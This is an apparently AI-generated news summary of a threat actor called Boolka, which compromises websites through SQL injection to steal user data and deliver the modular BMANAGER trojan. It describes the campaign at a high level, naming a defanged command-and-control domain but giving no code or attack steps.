June 25, 2024 at 07:51AM
A new threat actor named Boolka has been targeting websites with malicious scripts to distribute a trojan called BMANAGER. Using SQL injection attacks since 2022, Boolka infects sites with JavaScript capable of capturing user data. The trojan deploys multiple modules to steal sensitive information and establishes persistence on the host. This represents a significant evolution in the group’s tactics.
Based on the meeting notes, the following key takeaways can be summarized:
– A new threat actor dubbed Boolka has been observed carrying out opportunistic SQL injection attacks against websites since at least 2022, compromising websites with malicious scripts, and delivering a modular trojan codenamed BMANAGER.
– Boolka’s malicious JavaScript code, which connects to a command-and-control server named “boolka[.]tk,” intercepts user data in a Base64-encoded format, potentially collecting sensitive details like credentials and personal information.
– The JavaScript also redirects users to a fake loading page misleading them to download a browser extension, but in reality dropping a downloader for the BMANAGER trojan.
– The BMANAGER trojan serves as a conduit to deploy four additional modules, including BMBACKUP, BMHOOK, BMLOG, and BMREADER, and also establishes persistence on the host using scheduled tasks.
– Boolka’s operations reflect the group’s growing sophistication in tactics, demonstrating the development of its own malware delivery platform and trojans, such as BMANAGER, over time.
If you require further details or if there are specific aspects you would like to focus on, please let me know.